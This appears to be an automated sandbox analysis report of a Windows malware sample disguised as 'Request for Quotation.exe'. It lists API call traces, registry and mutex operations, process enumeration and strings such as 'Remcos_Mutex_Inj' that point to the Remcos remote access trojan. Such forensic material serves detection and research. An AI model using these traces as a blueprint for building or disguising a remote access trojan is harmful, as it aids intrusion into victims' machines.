                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                                                                  • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                                                                  • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                                                                  • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                                                                  • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                                                                  • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                                                                  • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                                                                  • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                                                                  • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                                                                • wcscpy.MSVCRT ref: 00409230
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                                                                  • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                                                                  • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                                                                • atoi.MSVCRT ref: 00409391
                                                                                • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                                                                • atoi.MSVCRT ref: 00409540
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                  • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                                                                  • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                                                                  • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                                                                  • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                                                                  • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                                                                  • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                                                                  • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                                                                  • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                                                                  • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                                                                  • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                                                                  • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                                                                • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Users\user\Desktop\Request for Quotation.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                                                                  • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                                                                  • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                                                                  • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                                                                  • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                                                                  • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                                                                  • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                                                                  • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                                                                • OpenMutexA.KERNEL32 ref: 00408E80
                                                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                                                                • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041BA5C,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                                                                  • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                                                                  • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                                                                  • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
